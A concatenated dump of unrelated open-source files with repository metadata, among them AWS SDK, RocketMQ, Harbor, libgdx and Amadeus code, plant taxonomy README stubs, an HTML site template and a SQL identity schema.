public StaticImageDeactivateScheduleActionSettings withFadeOut(Integer fadeOut) {
setFadeOut(fadeOut);
return this;
}
/**
* The image overlay layer to deactivate, 0 to 7. Default is 0.
*
* @param layer
* The image overlay layer to deactivate, 0 to 7. Default is 0.
*/
public void setLayer(Integer layer) {
this.layer = layer;
}
/**
* The image overlay layer to deactivate, 0 to 7. Default is 0.
*
* @return The image overlay layer to deactivate, 0 to 7. Default is 0.
*/
public Integer getLayer() {
return this.layer;
}
/**
* The image overlay layer to deactivate, 0 to 7. Default is 0.
*
* @param layer
* The image overlay layer to deactivate, 0 to 7. Default is 0.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public StaticImageDeactivateScheduleActionSettings withLayer(Integer layer) {
setLayer(layer);
return this;
}
/**
* Returns a string representation of this object. This is useful for testing and debugging. Sensitive data will be
* redacted from this string using a placeholder value.
*
* @return A string representation of this object.
*
* @see java.lang.Object#toString()
*/
@Override
public String toString() {
StringBuilder sb = new StringBuilder();
sb.append("{");
if (getFadeOut() != null)
sb.append("FadeOut: ").append(getFadeOut()).append(",");
if (getLayer() != null)
sb.append("Layer: ").append(getLayer());
sb.append("}");
return sb.toString();
}
@Override
public boolean equals(Object obj) {
if (this == obj)
return true;
if (obj == null)
return false;
if (obj instanceof StaticImageDeactivateScheduleActionSettings == false)
return false;
StaticImageDeactivateScheduleActionSettings other = (StaticImageDeactivateScheduleActionSettings) obj;
if (other.getFadeOut() == null ^ this.getFadeOut() == null)
return false;
if (other.getFadeOut() != null && other.getFadeOut().equals(this.getFadeOut()) == false)
return false;
if (other.getLayer() == null ^ this.getLayer() == null)
return false;
if (other.getLayer() != null && other.getLayer().equals(this.getLayer()) == false)
return false;
return true;
}
@Override
public int hashCode() {
final int prime = 31;
int hashCode = 1;
hashCode = prime * hashCode + ((getFadeOut() == null) ? 0 : getFadeOut().hashCode());
hashCode = prime * hashCode + ((getLayer() == null) ? 0 : getLayer().hashCode());
return hashCode;
}
@Override
public StaticImageDeactivateScheduleActionSettings clone() {
try {
return (StaticImageDeactivateScheduleActionSettings) super.clone();
} catch (CloneNotSupportedException e) {
throw new IllegalStateException("Got a CloneNotSupportedException from Object.clone() " + "even though we're Cloneable!", e);
}
}
@com.amazonaws.annotation.SdkInternalApi
@Override
public void marshall(ProtocolMarshaller protocolMarshaller) {
com.amazonaws.services.medialive.model.transform.StaticImageDeactivateScheduleActionSettingsMarshaller.getInstance().marshall(this, protocolMarshaller);
}
}
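/*
 * Illustrative usage sketch (not part of the generated SDK source): building the
 * settings with the fluent mutators above. The layer and fade-out values are
 * assumptions chosen for the example.
 */
class StaticImageDeactivateScheduleActionSettingsExample {
    public static void main(String[] args) {
        StaticImageDeactivateScheduleActionSettings settings = new StaticImageDeactivateScheduleActionSettings()
                .withLayer(1)      // deactivate the overlay on layer 1
                .withFadeOut(500); // fade the image out over 500 ms
        System.out.println(settings); // prints {FadeOut: 500,Layer: 1}
    }
}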
| jentfoo/aws-sdk-java | aws-java-sdk-medialive/src/main/java/com/amazonaws/services/medialive/model/StaticImageDeactivateScheduleActionSettings.java | Java | apache-2.0 | 5,899 |
# Arkezostis tayuya Kuntze SPECIES
#### Status
ACCEPTED
#### According to
International Plant Names Index
#### Published in
null
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Magnoliophyta/Magnoliopsida/Cucurbitales/Cucurbitaceae/Arkezostis/Arkezostis tayuya/README.md | Markdown | apache-2.0 | 174 |
/**
* Copyright (C) 2010-2013 Alibaba Group Holding Limited
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.alibaba.rocketmq.broker.client;
import io.netty.channel.Channel;
import java.util.List;
/**
* @author shijia.wxr<[email protected]>
* @since 2013-6-24
*/
public interface ConsumerIdsChangeListener {
public void consumerIdsChanged(final String group, final List<Channel> channels);
}
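/*
 * Minimal example implementation (a sketch, not shipped with RocketMQ): logs the
 * group whose consumer id list changed. A real broker-side listener would notify
 * the given channels so the affected consumers rebalance.
 */
class LoggingConsumerIdsChangeListener implements ConsumerIdsChangeListener {

    @Override
    public void consumerIdsChanged(final String group, final List<Channel> channels) {
        System.out.println("consumer ids changed for group " + group + ", "
                + (channels == null ? 0 : channels.size()) + " channel(s) affected");
    }
}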
| dingjun84/mq-backup | rocketmq-broker/src/main/java/com/alibaba/rocketmq/broker/client/ConsumerIdsChangeListener.java | Java | apache-2.0 | 963 |
# Lampocarya affinis Brongn. SPECIES
#### Status
SYNONYM
#### According to
The Catalogue of Life, 3rd January 2011
#### Published in
null
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Magnoliophyta/Liliopsida/Poales/Cyperaceae/Morelotia/Morelotia affinis/ Syn. Lampocarya affinis/README.md | Markdown | apache-2.0 | 183 |
# Myriocladus maguirei Swallen SPECIES
#### Status
ACCEPTED
#### According to
The Catalogue of Life, 3rd January 2011
#### Published in
null
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Magnoliophyta/Liliopsida/Poales/Poaceae/Myriocladus/Myriocladus maguirei/README.md | Markdown | apache-2.0 | 186 |
# Solanum apiculatibaccatum Bitter SPECIES
#### Status
SYNONYM
#### According to
The Catalogue of Life, 3rd January 2011
#### Published in
null
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Magnoliophyta/Magnoliopsida/Solanales/Solanaceae/Solanum/Solanum mite/ Syn. Solanum apiculatibaccatum/README.md | Markdown | apache-2.0 | 189 |
# Gnaphalium angustifolium Lam. SPECIES
#### Status
SYNONYM
#### According to
The Catalogue of Life, 3rd January 2011
#### Published in
Encycl. 2:746. 1788
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Magnoliophyta/Magnoliopsida/Asterales/Asteraceae/Helichrysum/Helichrysum litoreum/ Syn. Gnaphalium angustifolium/README.md | Markdown | apache-2.0 | 201 |
# Entylomella microstigma (Sacc.) Cif., 1959 SPECIES
#### Status
SYNONYM
#### According to
The Catalogue of Life, 3rd January 2011
#### Published in
Lejeunia Mém. 177 (1959)
#### Original name
null
### Remarks
null | mdoering/backbone | life/Fungi/Basidiomycota/Exobasidiomycetes/Entylomatales/Entylomataceae/Entyloma/Entyloma achilleae/ Syn. Entylomella microstigma/README.md | Markdown | apache-2.0 | 220 |
# Acacia pennatula (Schltdl. & Cham.) Benth. SPECIES
#### Status
ACCEPTED
#### According to
The Catalogue of Life, 3rd January 2011
#### Published in
London J. Bot. 1:390. 1842
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Magnoliophyta/Magnoliopsida/Fabales/Fabaceae/Acacia/Acacia pennatula/README.md | Markdown | apache-2.0 | 222 |
# Niptera dilutella (Fr.) Rehm SPECIES
#### Status
SYNONYM
#### According to
The Catalogue of Life, 3rd January 2011
#### Published in
null
#### Original name
null
### Remarks
null | mdoering/backbone | life/Fungi/Ascomycota/Orbiliomycetes/Orbiliales/Orbiliaceae/Orbilia/Hyalinia dilutella/ Syn. Niptera dilutella/README.md | Markdown | apache-2.0 | 185 |
// Copyright (c) 2017 VMware, Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
//    http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package dao
import (
	"fmt"
	"time"

	"github.com/astaxie/beego/orm"
	"github.com/vmware/harbor/src/common/models"
)
// AddScanJob ...
func AddScanJob(job models.ScanJob) (int64, error) {
o := GetOrmer()
if len(job.Status) == 0 {
job.Status = models.JobPending
}
return o.Insert(&job)
}
// GetScanJob returns the scan job with the given ID, or nil if it does not exist.
func GetScanJob(id int64) (*models.ScanJob, error) {
	o := GetOrmer()
	j := models.ScanJob{ID: id}
	err := o.Read(&j)
	if err == orm.ErrNoRows {
		return nil, nil
	}
	if err != nil {
		return nil, err
	}
	return &j, nil
}
// GetScanJobsByImage returns a list of scan jobs with given repository and tag
func GetScanJobsByImage(repository, tag string, limit ...int) ([]*models.ScanJob, error) {
var res []*models.ScanJob
_, err := scanJobQs(limit...).Filter("repository", repository).Filter("tag", tag).OrderBy("-id").All(&res)
return res, err
}
// GetScanJobsByDigest returns a list of scan jobs with given digest
func GetScanJobsByDigest(digest string, limit ...int) ([]*models.ScanJob, error) {
var res []*models.ScanJob
_, err := scanJobQs(limit...).Filter("digest", digest).OrderBy("-id").All(&res)
return res, err
}
// UpdateScanJobStatus updates the status of a scan job.
func UpdateScanJobStatus(id int64, status string) error {
o := GetOrmer()
sj := models.ScanJob{
ID: id,
Status: status,
UpdateTime: time.Now(),
}
n, err := o.Update(&sj, "Status", "UpdateTime")
if n == 0 {
return fmt.Errorf("Failed to update scan job with id: %d, error: %v", id, err)
}
return err
}
func scanJobQs(limit ...int) orm.QuerySeter {
o := GetOrmer()
l := -1
if len(limit) == 1 {
l = limit[0]
}
return o.QueryTable(models.ScanJobTable).Limit(l)
}
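// Example (illustrative only, not part of Harbor): a typical create-then-update
// flow for a scan job. The Repository/Tag field names and the JobRunning status
// constant are assumptions about the models package.
func exampleScanJobFlow() error {
	id, err := AddScanJob(models.ScanJob{Repository: "library/ubuntu", Tag: "14.04"})
	if err != nil {
		return err
	}
	// mark the job as running once a scanner picks it up
	return UpdateScanJobStatus(id, models.JobRunning)
}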
| wknet123/harbor | src/common/dao/scan_job.go | GO | apache-2.0 | 2,269 |
package com.bjorktech.cayman.idea.designpattern.structure.proxy;
public class TargetClass implements TargetInterface {
@Override
public long add(long a, long b) {
long temp = a + b;
System.out.println(temp);
return temp;
}
@Override
public long sub(long a, long b) {
long temp = a - b;
System.out.println(temp);
return temp;
}
}
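/*
 * Companion sketch for the proxy pattern this package demonstrates (an assumption:
 * the project's actual proxy class lives elsewhere in the package). The proxy
 * implements the same interface and decorates each call with simple logging before
 * delegating to the real target.
 */
class TargetClassProxy implements TargetInterface {

	private final TargetInterface target = new TargetClass();

	@Override
	public long add(long a, long b) {
		System.out.println("proxy: before add");
		long result = target.add(a, b);
		System.out.println("proxy: after add");
		return result;
	}

	@Override
	public long sub(long a, long b) {
		System.out.println("proxy: before sub");
		long result = target.sub(a, b);
		System.out.println("proxy: after sub");
		return result;
	}
}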
| wanliwang/cayman | cm-idea/src/main/java/com/bjorktech/cayman/idea/designpattern/structure/proxy/TargetClass.java | Java | apache-2.0 | 351 |
package com.badlogic.gdx.ingenuity.scene2d;
import com.badlogic.gdx.graphics.Color;
import com.badlogic.gdx.ingenuity.GdxData;
import com.badlogic.gdx.ingenuity.helper.PixmapHelper;
import com.badlogic.gdx.ingenuity.utils.GdxUtilities;
import com.badlogic.gdx.scenes.scene2d.Group;
import com.badlogic.gdx.scenes.scene2d.Stage;
import com.badlogic.gdx.scenes.scene2d.actions.Actions;
import com.badlogic.gdx.scenes.scene2d.ui.Image;
import com.badlogic.gdx.utils.Align;
import com.badlogic.gdx.utils.Disposable;
/**
 * @author Mitkey
 * @date 2017-03-24 15:09:56
 * @description:
 * @version xx
*/
public class Loading implements Disposable {
private Group root = new Group();
private Image imgOut;
private Image imgInner;
public Loading() {
root.setSize(GdxData.WIDTH, GdxData.HEIGHT);
Image imgBg = new Image(PixmapHelper.getInstance().newTranslucentDrawable(5, 5));
imgBg.setFillParent(true);
root.addActor(imgBg);
imgOut = new Image(PixmapHelper.getInstance().newRectangleDrawable(Color.YELLOW, 40, 40));
imgOut.setOrigin(Align.center);
imgInner = new Image(PixmapHelper.getInstance().newCircleDrawable(Color.RED, 18));
imgInner.setOrigin(Align.center);
GdxUtilities.center(imgOut);
GdxUtilities.center(imgInner);
root.addActor(imgOut);
root.addActor(imgInner);
}
public void show(Stage stage) {
stage.addActor(root);
root.toFront();
imgOut.clearActions();
imgOut.addAction(Actions.forever(Actions.rotateBy(-360, 1f)));
imgInner.clearActions();
imgInner.addAction(Actions.forever(Actions.rotateBy(360, 2f)));
}
public void hide() {
root.remove();
}
@Override
public void dispose() {
hide();
}
}
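/*
 * Usage sketch (illustration only): the overlay is shown while asynchronous work
 * runs and removed when it completes. The stage and the loading workflow are
 * assumed to be managed by the caller.
 */
class LoadingUsageExample {
	void demo(Stage stage) {
		Loading loading = new Loading();
		loading.show(stage); // adds the overlay and starts both spin actions
		// ... kick off asset loading or other background work here ...
		loading.hide(); // remove the overlay once the work is done
	}
}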
| mitkey/libgdx-ingenuity | depot/src/com/badlogic/gdx/ingenuity/scene2d/Loading.java | Java | apache-2.0 | 1,675 |
<?php
/**
* amadeus-ws-client
*
* Copyright 2020 Amadeus Benelux NV
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* @package Amadeus
* @license https://opensource.org/licenses/Apache-2.0 Apache 2.0
*/
namespace Amadeus\Client\RequestCreator\Converter\Fare;
use Amadeus\Client\RequestCreator\Converter\BaseConverter;
use Amadeus\Client\RequestOptions\FarePriceUpsellWithoutPnrOptions;
use Amadeus\Client\Struct;
/**
* Fare_PriceUpsellWithoutPNR Request converter
*
* @package Amadeus\Client\RequestCreator\Converter\Fare
* @author Valerii Nezhurov <[email protected]>
*/
class PriceUpsellWithoutPNRConv extends BaseConverter
{
/**
* @param FarePriceUpsellWithoutPnrOptions $requestOptions
* @param int|string $version
* @return Struct\Fare\PriceUpsellWithoutPNR
*/
public function convert($requestOptions, $version)
{
return new Struct\Fare\PriceUpsellWithoutPNR($requestOptions);
}
}
| amabnl/amadeus-ws-client | src/Amadeus/Client/RequestCreator/Converter/Fare/PriceUpsellWithoutPNRConv.php | PHP | apache-2.0 | 1,463 |
package com.concavenp.nanodegree.shared;
import org.junit.Test;
import static org.junit.Assert.*;
/**
* To work on unit tests, switch the Test Artifact in the Build Variants view.
*/
public class ExampleUnitTest {
@Test
public void addition_isCorrect() throws Exception {
assertEquals(4, 2 + 2);
}
} | concaveNP/GoUbiquitous | shared/src/test/java/com/concavenp/nanodegree/shared/ExampleUnitTest.java | Java | apache-2.0 | 324 |
<!DOCTYPE HTML>
<html>
<head>
<title>{#$site_title#}</title>
<meta charset="utf-8">
<meta name="Keywords" content="{#$site_keywords#}" />
<meta name="Description" content="{#$site_description#}" />
<link href="{#$site_root#}themes/default/skin/nav.css" rel="stylesheet" type="text/css" />
<script type="text/javascript">var sitepath = '{#$site_root#}'; var rewrite = '{#$cfg.link_struct#}';</script>
<script type="text/javascript" src="{#$site_root#}public/scripts/jquery.min.js"></script>
<script type="text/javascript" src="{#$site_root#}public/scripts/common.js"></script>
</head>
<body>
{#include file="topbar.html"#}
<div id="wrapper">
<div id="header">
<div id="topbox">
<a href="{#$site_url#}" class="logo" title="{#$site_title#}"></a>
<div id="sobox">
<form name="sofrm" class="sofrm" method="get" action="" onSubmit="return rewrite_search()">
<input name="mod" type="hidden" id="mod" value="search" />
<input name="type" type="hidden" id="type" value="name" />
<div id="selopt">
<div id="cursel">网站名称</div>
<ul id="options">
<li><a href="javascript: void(0);" name="name">网站名称</a></li>
<li><a href="javascript: void(0);" name="url">网站地址</a></li>
<li><a href="javascript: void(0);" name="tags">TAG标签</a></li>
<li><a href="javascript: void(0);" name="intro">网站描述</a></li>
</ul>
</div>
<input name="query" type="text" class="sipt" id="query" onFocus="this.value='';" /><input type="submit" class="sbtn" value="搜 索" />
</form>
</div>
</div>
<div id="navbox">
<ul class="navbar">
<li><a href="?mod=index">网站首页</a></li><li class="navline"></li>
<li><a href="?mod=webdir">网站目录</a></li><li class="navline"></li>
<li><a href="?mod=article">站长资讯</a></li><li class="navline"></li>
<li><a href="?mod=weblink">链接交换</a></li><li class="navline"></li>
<li><a href="?mod=category">分类浏览</a></li><li class="navline"></li>
<li><a href="?mod=update">最新收录</a></li><li class="navline"></li>
<li><a href="?mod=archives">数据归档</a></li><li class="navline"></li>
<li><a href="?mod=top">TOP排行榜</a></li><li class="navline"></li>
<li><a href="?mod=feedback">意见反馈</a></li><li class="navline"></li>
</ul>
</div>
<div id="txtbox">
<div class="count">数据统计:<b>{#$stat.category#}</b>个主题分类,<b>{#$stat.website#}</b>个优秀站点,<b>{#$stat.article#}</b>篇站长资讯</div>
<div class="link">快捷方式:<a href="{#$site_root#}member/?mod=website&act=add">网站提交</a> - <a href="{#$site_root#}member/?mod=article&act=add">软文投稿</a> - <a href="{#$site_root#}?mod=diypage&pid=1">帮助中心</a></div>
</div>
</div>
<div class="blank10"></div>
<div id="quickbox"><strong>快速审核:</strong>{#foreach from=get_websites(0, 12, true) item=quick#}<a href="{#$quick.web_link#}" title="{#$quick.web_name#}">{#$quick.web_name#}</a>{#/foreach#}</div>
<div class="blank10"></div>
<div id="homebox">
<div id="homebox-left">
<dl id="hcatebox" class="clearfix">
{#foreach from=get_categories() item=cate#}
{#if $cate.cate_mod == 'webdir'#}
<dt><a href="{#$cate.cate_link#}">{#$cate.cate_name#}</a></dt>
<dd>
<ul class="hcatelist">
{#foreach from=get_categories($cate.cate_id) item=scate#}
<li><a href="{#$scate.cate_link#}">{#$scate.cate_name#}</a></li>
{#/foreach#}
</ul>
</dd>
{#/if#}
{#/foreach#}
</dl>
<div class="blank10"></div>
<div id="newbox">
<h3>最新收录</h3>
<ul class="newlist">
{#foreach from=get_websites(0, 14) item=new#}
<li><span>{#$new.web_ctime#}</span><a href="{#$new.web_link#}" title="{#$new.web_name#}">{#$new.web_name#}</a></li>
{#/foreach#}
</ul>
</div>
</div>
<div id="homebox-right">
<div id="bestbox">
<h3><span>站长推荐</span></h3>
<ul class="clearfix bestlist">
{#foreach from=get_websites(0, 35, false, true) item=best#}
<li><a href="{#$best.web_link#}" title="{#$best.web_name#}">{#$best.web_name#}</a></li>
{#/foreach#}
</ul>
</div>
<div class="blank10"></div>
<div id="coolbox" class="clearfix">
<h3>酷站导航</h3>
<ul class="csitelist">
{#foreach from=get_best_categories() item=cate name=csite#}
<li><h4><a href="{#$cate.cate_link#}">{#$cate.cate_name#}</a></h4><a href="{#$cate.cate_link#}" class="more">更多>></a>{#foreach from=get_websites($cate.cate_id, 5) item=cool#}<span><a href="{#$cool.web_link#}" title="{#$cool.web_name#}">{#$cool.web_name#}</a></span>{#/foreach#}</li>
{#if $smarty.foreach.csite.iteration % 5 == 0 && $smarty.foreach.csite.iteration != 20#}
<li class="sline"></li>
{#/if#}
{#/foreach#}
</ul>
</div>
<div class="blank10"></div>
<div id="rowbox" class="clearfix">
<div id="newsbox">
<h3>站点资讯</h3>
<ul class="newslist">
{#foreach from=get_articles(0, 8, false) item=art#}
<li><span>{#$art.art_ctime#}</span><a href="{#$art.art_link#}">{#$art.art_title#}</a></li>
{#/foreach#}
</ul>
</div>
<div class="line"></div>
<div id="exlink">
<h3>链接交换</h3>
<ul class="exlist">
{#foreach from=get_weblinks(0, 8) item=link#}
<li><a href="{#$link.web_link#}">{#$link.link_name#} - PR{#$link.web_grank#},百度权重{#$link.web_brank#},{#$link.deal_type#}友情链接</a></li>
{#/foreach#}
</ul>
</div>
</div>
</div>
</div>
<div class="blank10"></div>
<div id="inbox" class="clearfix">
<h3>最新点入</h3>
<ul class="inlist">
{#nocache#}
{#foreach from=get_websites(0, 30, false, false, 'instat') item=instat#}
<li><a href="{#$instat.web_link#}" title="{#$instat.web_name#}">{#$instat.web_name#}</a></li>
{#/foreach#}
{#/nocache#}
</ul>
</div>
<div class="blank10"></div>
<div id="linkbox" class="clearfix">
<h3>友情链接</h3>
<ul class="linklist">
{#foreach from=get_links() item=link#}
<li><a href="{#$link.link_url#}" target="_blank">{#$link.link_name#}</a></li>
{#/foreach#}
</ul>
</div>
{#include file="footer.html"#}
</div>
</body>
</html> | zhanxizhu/lxsndir | themes/模板/base/index.html | HTML | apache-2.0 | 7,388 |
/*
* Copyright (c) 2013-2015 Josef Hardi <[email protected]>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.obidea.semantika.datatype;
import com.obidea.semantika.datatype.exception.InvalidLexicalFormException;
import com.obidea.semantika.datatype.primitive.XsdDecimal;
public abstract class AbstractDerivedDecimalType extends AbstractXmlType<Number>
{
protected AbstractDerivedDecimalType(String name)
{
super(name);
}
@Override
public IDatatype<?> getPrimitiveDatatype()
{
return XsdDecimal.getInstance();
}
@Override
public Number getValue(String lexicalForm)
{
return parseLexicalForm(lexicalForm);
}
@Override
public boolean isPrimitive()
{
return false;
}
/**
* Parse and validate a lexical form of the literal.
*
* @param lexicalForm
    *           the lexical form of the literal.
* @return A <code>Number</code> representation of the literal
* @throws InvalidLexicalFormException
* if the literal form is invalid or the value is out of range
*/
protected abstract Number parseLexicalForm(String lexicalForm) throws InvalidLexicalFormException;
}
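/*
 * Schematic subclass (hypothetical, for illustration only). Two loud assumptions:
 * AbstractXmlType declares no further abstract members beyond what this file shows,
 * and InvalidLexicalFormException offers a (String name, String lexicalForm)
 * constructor; adjust both to the real API if they differ.
 */
class ExampleBoundedDecimalType extends AbstractDerivedDecimalType
{
   protected ExampleBoundedDecimalType()
   {
      super("http://example.org/datatype#boundedDecimal"); // hypothetical datatype name
   }

   @Override
   protected Number parseLexicalForm(String lexicalForm) throws InvalidLexicalFormException
   {
      try {
         return new java.math.BigDecimal(lexicalForm.trim());
      }
      catch (NumberFormatException e) {
         // assumed constructor signature; see the lead-in comment above
         throw new InvalidLexicalFormException("boundedDecimal", lexicalForm);
      }
   }
}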
| obidea/semantika | src/main/java/com/obidea/semantika/datatype/AbstractDerivedDecimalType.java | Java | apache-2.0 | 1,709 |
using System;
namespace EtoTest.Model
{
public class DataFileVersion
{
/// <summary>
		/// The name of this station - written to the name of conflict files when resyncing.
/// </summary>
public String StationName { get; set; }
/// <summary>
		/// If this ID is different from the current one on Google Drive, then updates have occurred on Google.
/// </summary>
public int FromVersionId { get; set; }
/// <summary>
/// If we have made some of our own updates when offline, then this value is incremented from 0.
/// </summary>
public int? CurrentVersionId { get; set; }
/// <summary>
		/// A description of the operation that we are about to attempt. If this value is set, then we crashed before the last operation completed.
/// Set to null immediately after completing an operation.
/// </summary>
public String BeforeOperation { get; set; }
}
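	/// <summary>
	/// Illustrative helper (a sketch, not part of the original model): how the version
	/// fields above would typically drive a sync decision. The rules encoded here are
	/// assumptions inferred from the property comments.
	/// </summary>
	public static class DataFileVersionExample
	{
		public static bool HasRemoteChanges(DataFileVersion local, int remoteVersionId)
		{
			// remote updates occurred if Google Drive moved past the version we started from
			return remoteVersionId != local.FromVersionId;
		}

		public static bool HasLocalChanges(DataFileVersion local)
		{
			// offline edits increment CurrentVersionId from 0
			return local.CurrentVersionId.HasValue && local.CurrentVersionId.Value > 0;
		}

		public static bool NeedsCrashRecovery(DataFileVersion local)
		{
			// a non-null BeforeOperation means the last operation never completed
			return local.BeforeOperation != null;
		}
	}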
} | michaeljfarr/FilePharoah | m.Indexer/EtoTest/Model/DataFileVersion.cs | C# | apache-2.0 | 984 |
/*
Copyright (C) 2013-2020 Expedia Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package com.hotels.styx.support.matchers;
import org.hamcrest.Description;
import org.hamcrest.Matcher;
import org.hamcrest.TypeSafeMatcher;
import java.util.Objects;
import java.util.Optional;
/**
* Provides matchers around the {@code Optional} class.
*
* @param <T>
* @author john.butler
* @see Optional
*/
public final class IsOptional<T> extends TypeSafeMatcher<Optional<? extends T>> {
/**
* Checks that the passed Optional is not present.
*/
public static IsOptional<Object> isAbsent() {
return new IsOptional<>(false);
}
/**
* Checks that the passed Optional is present.
*/
public static IsOptional<Object> isPresent() {
return new IsOptional<>(true);
}
public static <T> IsOptional<T> isValue(T value) {
return new IsOptional<>(value);
}
public static <T> IsOptional<T> matches(Matcher<T> matcher) {
return new IsOptional<>(matcher);
}
public static <T extends Iterable> IsOptional<T> isIterable(Matcher<? extends Iterable> matcher) {
return new IsOptional<>((Matcher) matcher);
}
private final boolean someExpected;
private final Optional<T> expected;
private final Optional<Matcher<T>> matcher;
private IsOptional(boolean someExpected) {
this.someExpected = someExpected;
this.expected = Optional.empty();
this.matcher = Optional.empty();
}
private IsOptional(T value) {
this.someExpected = true;
this.expected = Optional.of(value);
this.matcher = Optional.empty();
}
private IsOptional(Matcher<T> matcher) {
this.someExpected = true;
this.expected = Optional.empty();
this.matcher = Optional.of(matcher);
}
@Override
public void describeTo(Description description) {
if (!someExpected) {
description.appendText("<Absent>");
} else if (expected.isPresent()) {
description.appendValue(expected);
} else if (matcher.isPresent()) {
description.appendText("a present value matching ");
matcher.get().describeTo(description);
} else {
description.appendText("<Present>");
}
}
@Override
public boolean matchesSafely(Optional<? extends T> item) {
if (!someExpected) {
return !item.isPresent();
} else if (expected.isPresent()) {
return item.isPresent() && Objects.equals(item.get(), expected.get());
} else if (matcher.isPresent()) {
return item.isPresent() && matcher.get().matches(item.get());
} else {
return item.isPresent();
}
}
}
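/*
 * Usage sketch (illustration only): typical assertions with the factory methods
 * above. Hamcrest's MatcherAssert/CoreMatchers are assumed to be on the classpath,
 * as they are wherever this matcher is used in tests.
 */
final class IsOptionalExamples {
    public static void main(String[] args) {
        org.hamcrest.MatcherAssert.assertThat(Optional.empty(), IsOptional.isAbsent());
        org.hamcrest.MatcherAssert.assertThat(Optional.of("styx"), IsOptional.isValue("styx"));
        org.hamcrest.MatcherAssert.assertThat(Optional.of(42), IsOptional.matches(org.hamcrest.CoreMatchers.is(42)));
    }
}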
| mikkokar/styx | support/testsupport/src/main/java/com/hotels/styx/support/matchers/IsOptional.java | Java | apache-2.0 | 3,272 |
-- Start of IDN Tables --
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_BASE_TABLE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_BASE_TABLE (
PRODUCT_NAME VARCHAR(20),
PRIMARY KEY (PRODUCT_NAME)
);
INSERT INTO IDN_BASE_TABLE values ('WSO2 Identity Server');
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH_CONSUMER_APPS]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH_CONSUMER_APPS (
ID INTEGER IDENTITY,
CONSUMER_KEY VARCHAR(255),
CONSUMER_SECRET VARCHAR(2048),
USERNAME VARCHAR(255),
TENANT_ID INTEGER DEFAULT 0,
USER_DOMAIN VARCHAR(50),
APP_NAME VARCHAR(255),
OAUTH_VERSION VARCHAR(128),
CALLBACK_URL VARCHAR(2048),
GRANT_TYPES VARCHAR(1024),
PKCE_MANDATORY CHAR(1) DEFAULT '0',
PKCE_SUPPORT_PLAIN CHAR(1) DEFAULT '0',
APP_STATE VARCHAR (25) DEFAULT 'ACTIVE',
USER_ACCESS_TOKEN_EXPIRE_TIME BIGINT DEFAULT 3600,
APP_ACCESS_TOKEN_EXPIRE_TIME BIGINT DEFAULT 3600,
REFRESH_TOKEN_EXPIRE_TIME BIGINT DEFAULT 84600,
ID_TOKEN_EXPIRE_TIME BIGINT DEFAULT 3600,
CONSTRAINT CONSUMER_KEY_CONSTRAINT UNIQUE (CONSUMER_KEY),
PRIMARY KEY (ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_SCOPE_VALIDATORS]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_SCOPE_VALIDATORS (
APP_ID INTEGER NOT NULL,
SCOPE_VALIDATOR VARCHAR (128) NOT NULL,
PRIMARY KEY (APP_ID,SCOPE_VALIDATOR),
FOREIGN KEY (APP_ID) REFERENCES IDN_OAUTH_CONSUMER_APPS(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH1A_REQUEST_TOKEN]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH1A_REQUEST_TOKEN (
REQUEST_TOKEN VARCHAR(512),
REQUEST_TOKEN_SECRET VARCHAR(512),
CONSUMER_KEY_ID INTEGER,
CALLBACK_URL VARCHAR(2048),
SCOPE VARCHAR(2048),
AUTHORIZED VARCHAR(128),
OAUTH_VERIFIER VARCHAR(512),
AUTHZ_USER VARCHAR(512),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (REQUEST_TOKEN),
FOREIGN KEY (CONSUMER_KEY_ID) REFERENCES IDN_OAUTH_CONSUMER_APPS(ID) ON DELETE CASCADE
);
